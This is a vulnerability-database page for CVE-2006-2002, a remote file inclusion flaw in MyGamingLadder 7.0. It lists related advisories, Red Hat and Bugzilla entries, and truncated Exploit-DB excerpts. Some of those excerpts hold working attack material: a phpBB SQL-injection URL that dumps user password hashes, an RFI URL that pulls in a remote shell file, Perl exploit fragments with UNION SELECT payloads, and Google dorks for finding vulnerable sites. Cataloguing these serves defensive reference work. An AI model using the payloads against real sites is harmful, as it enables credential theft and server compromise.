CVE-2006-2002
Published 2006-04-25
Priority P3 · 33 · medium · 5 CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS 2.88% (85.1th percentile)
PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mygamingladder | mygamingladder | — | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:P/A:N
vendor_redhat · 7.5 HIGH
GHSA
GHSA-2h5q-c5qh-j6jr: PHP remote file inclusion vulnerability in stats
ghsa_unreviewed·2022-05-01
CVE-2006-2002 [MEDIUM] GHSA-2h5q-c5qh-j6jr: PHP remote file inclusion vulnerability in stats
PHP remote file inclusion vulnerability in stats.php in MyGamingLadder 7.0 allows remote attackers to execute arbitrary PHP code via a URL in the dir[base] parameter.
GHSA
Apache Tomcat Default Installation Reveals Sensitive Information
ghsa·2022-04-30
CVE-2002-2006 [LOW] Apache Tomcat Default Installation Reveals Sensitive Information
The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
Citrix
Citrix Workspace app for Windows Security Update
vendor_citrix·2020-09-08·CVSS 8.8
CVE-2020-8207 [HIGH] Citrix Workspace app for Windows Security Update
of Problem
A vulnerability has been identified in the automatic update service of Citrix Workspace app for Windows that could result in:
- A local user escalating their privilege level to that of an administrator on the computer running Citrix Workspace app for Windows.
- A remote compromise of the computer running Citrix Workspace app when Windows file sharing (SMB) is enabled.
The issue has the following identifier: CVE-2020-8207
This vulnerability affects the following supported versions of Citrix Workspace app for Windows:
- Citrix Workspace app 2002, 2006 and 2006.1 for Windows
- Citrix Workspace app 1912 LTSR for Windows (before CU1 Hotfix 1)
Note that this vulnerability was originally reported against a subset of the versions above. However,
Red Hat
security flaw
vendor_redhat·2006-11-21·CVSS 5.0
CVE-2006-6097 [MEDIUM] security flaw
GNU tar 1.16 and 1.15.1, and possibly other versions, allows user-assisted attackers to overwrite arbitrary files via a tar file that contains a GNUTYPE_NAMES record with a symbolic link, which is not properly handled by the extract_archive function in extract.c and extract_mangle function in mangle.c, a variant of CVE-2002-1216.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
security flaw
vendor_redhat·2006-04-24·CVSS 7.5
CVE-2006-1990 [HIGH] security flaw
Integer overflow in the wordwrap function in string.c in PHP 4.4.2 and 5.1.2 might allow context-dependent attackers to execute arbitrary code via certain long arguments that cause a small buffer to be allocated, which triggers a heap-based buffer overflow in a memcpy function call, a different vulnerability than CVE-2002-1396.
No detection rules found.
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
exploitdb·2007-10-22
CVE-2007-5627 Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
---
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"
DORK2: "Powered by SocketMail"
[email protected]
shadow.php0h.com
# milw0rm.com [2007-10-22]
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
---
ECHO.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] and contributors (see www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// display the details for an author
require_once($base_path.'/includes/templates
Exploit-DB
x-news 1.1 - 'users.txt' Remote Password Disclosure
exploitdb·2006-12-30
CVE-2002-1656 x-news 1.1 - 'users.txt' Remote Password Disclosure
---
x-news 1.1 Password Disclosure Vulnerability
Affected Software: x-news 1.1
x-news Website: http://xqus.com
Bugfounder: bd0rk
Website: www.soh-crew.it.tt
Contact: bd0rk[at]hackermail.com
Greetings: str0ke, Perle, TheJT, ajann
[+]Exploit: http://[target]/[x_news_path]/news/db/users.txt
Showexample: |username|MD5-Hash|eMail|
# milw0rm.com [2006-12-30]
Exploit-DB
N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion
exploitdb·2006-10-27
CVE-2006-5625 N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion
---
#!/usr/bin/php -q -d short_open_tag=on
DEVIL TEAM - POLISH TEAM http://www.rahim.webd.pl/
N/X 2002 Professional Edition Web CMS
Greetings DragonHeart and all DEVIL TEAM Patriots :)
Leito - Leon - TomZen - Gelo - Ramzes - DMX - Ci2u - Larry
@steriod - Drzewko - CrazzyIwan - ARCLITE - Rammstein - Adam
Kicaj - DeathSpeed - Arkadius - Michas - pepi - nukedclx
SkD - MXZ - sysios - mIvus - wack
Exploit-DB
Zix Forum 1.12 - 'RepId' SQL Injection (2)
exploitdb·2006-09-17
CVE-2006-4612 Zix Forum 1.12 - 'RepId' SQL Injection (2)
---
#!/usr/bin/perl
###########################################
# ZIXForum
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################
use IO::Socket::INET;
usage() unless (@ARGV == 2);
$host = shift(@ARGV);
$dir = shift(@ARGV);
$dir = "\/$dir" if ($dir !~ /^\//);
$dir = "$dir\/" if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;
$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
Exploit-DB
Sponge News 2.2 - 'sndir' Remote File Inclusion
exploitdb·2006-09-05
CVE-2006-4647 Sponge News 2.2 - 'sndir' Remote File Inclusion
---
#==============================================================================================
#Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://rickeeweb.free.fr/spongeweb/
#
#Version : v2.2
#
#================================================================================================
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
# ########################
# # Useful variables     #
# ########################
# $newsdir = "news/";
# $commentdir = "comments/";
# $snversion = "2.2";
# $lastmodif = "Decembre 2002";
# $scriptdir = $sndir;
# $page = $curre
Exploit-DB
Microsoft Office 2000/2002 - Property Code Execution
exploitdb·2006-07-11·CVSS 9.3
CVE-2006-2389 [CRITICAL] Microsoft Office 2000/2002 - Property Code Execution
---
source: https://www.securityfocus.com/bid/18911/info
Microsoft Office is prone to a code-execution vulnerability. This is due to a failure to handle exceptional conditions.
Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users.
#Microsoft Office Property Code Execution exploit (CVE-2006-2389)
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Vulnerable application MS Office 2003
#Tested on XP SP2 - MS Office 2003
#Greets Mila http://contagiodump.blogspot.com, Villy and ASL IT SECURITY TEAM
#!/usr/bin/python
import sys
import zl
Exploit-DB
D-Link DWL Series Access-Point 2.10na - Config Disclosure
exploitdb·2006-06-08
CVE-2006-2901 D-Link DWL Series Access-Point 2.10na - Config Disclosure
---
# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/
Making an HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).
Making an HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).
However, making an HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration.
For example, making the following request:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
We would have a result equivalent to the following:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO
Exploit-DB
My Gaming Ladder Combo System 7.0 - Remote Code Execution
exploitdb·2006-04-22
CVE-2006-2002 My Gaming Ladder Combo System 7.0 - Remote Code Execution
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=28
#Usage: ladder.pl
#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages.
use IO::Socket;
if(@ARGV \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to My Gaming Ladder ex: /ladder/\r\n";
print "- -> Command to execute ex: ls -la\r\n";
print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$echoing = "";
$ldserver = $ARGV[0];
$ldserver =~ s/(http:\/\/)//eg;
$ldhost = "http://".$ldserver;
$lddir = $ARGV[1];
$ldport = "80";
$ldtar = "sta
Exploit-DB
Microsoft Office Products - Array Index Bounds Error (PoC)
exploitdb·2006-03-27
CVE-2006-1540 Microsoft Office Products - Array Index Bounds Error (PoC)
---
# Full archive at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1615.rar (excel_03262006.rar)
Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
Date : 02/12/2006
Author : posidron
Table of Contents
- Some Excel Information
- The XLS File Format and Observation
- The XLW File Format and Observation
- Powerpoint and Word Dump Additions
- Conclusion
- References
Some Excel Information
- Microsoft Excel uses the BIFF (Binary Interchange File Format)
- in Excel 8.0 (Excel 97), BIFF8 was introduced
- in Excel 10.0 (Excel XP), BIFF8X was introduced
- Excel 97 and Excel 2000 can read BIFF8X, except new features added with Excel XP.
Since BIFF5, all data is saved
Exploit-DB
Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure
exploitdb·2002-04-23
CVE-2002-2006 Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure
---
source: https://www.securityfocus.com/bid/4575/info
Apache Tomcat is a servlet container for use with the Java Servlet and JavaServer Pages technologies. Tomcat may be run on most UNIX and Linux variants as well as Microsoft Windows.
Apache Tomcat ships with a number of example classes (SnoopServlet and TroubleShooter) that may reveal the absolute path of the Tomcat installation when requested.
Disclosure of this type of sensitive information may aid in further attacks against the host running the vulnerable software.
http://localhost:8080/examples/servlet/SnoopServlet
http://localhost:8080/examples/servlet/TroubleShooter
Bugzilla
CVE-2006-1990 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2006-1990 [HIGH] CVE-2006-1990 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Integer overflow in the wordwrap function in string.c in PHP 4.4.2 and 5.1.2 might allow context-dependent attackers to execute arbitrary code via certain long arguments that cause a small buffer to be allocated, which triggers a heap-based buffer overflow in a memcpy function call, a different vulnerability than CVE-2002-1396.
Bugzilla
CVE-2006-6097 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2006-6097 [MEDIUM] CVE-2006-6097 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
GNU tar 1.16 and 1.15.1, and possibly other versions, allows user-assisted attackers to overwrite arbitrary files via a tar file that contains a GNUTYPE_NAMES record with a symbolic link, which is not properly handled by the extract_archive function in extract.c and extract_mangle function in mangle.c, a variant of CVE-2002-1216.
---
Statement:
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2002-2214 php imap To header buffer overflow
bugzilla·2006-06-15·CVSS 5.0
CVE-2002-2214 [MEDIUM] CVE-2002-2214 php imap To header buffer overflow
This upstream bug:
http://bugs.php.net/bug.php?id=15595
describes a buffer overflow that occurs when the php imap functions are used to
view a malformed message.
There is a patch in attachment 130838
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0567.html
Bugzilla
Multiple tar issues (CVE-2005-1918, CVE-2006-0300)
bugzilla·2006-03-02·CVSS 5.0
CVE-2005-1918 [MEDIUM] Multiple tar issues (CVE-2005-1918, CVE-2006-0300)
There are two separate issues that affect different subsets of our products.
I. RHL 7.3, RHL 9, FC1 & FC2: tar archive path traversal issue
CVE-2005-1918: "The original patch for a GNU tar directory traversal
vulnerability (CVE-2002-0399) in Red Hat Enterprise Linux 3 and 2.1 uses
an 'incorrect optimization' that allows user-complicit attackers to over-
write arbitrary files via a crafted tar file, probably involving '/../'
sequences with a leading '/'."
This vulnerability appears to only affect tar-1.13.25 releases, which
these four distros use.
Red Hat issued RHSA-2006:0195-01 for RHEL 2.1 and RHEL 3:
"In 2002, a path traversal flaw was found in the way GNU tar extracted
archives. A malicious user could create a tar archive that cou
- http://secunia.com/advisories/19773
- http://www.nukedx.com/?viewdoc=28
- http://www.osvdb.org/24892
- http://www.securityfocus.com/archive/1/431902/100/0/threaded
- http://www.securityfocus.com/bid/17657
- http://www.vupen.com/english/advisories/2006/1483
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25992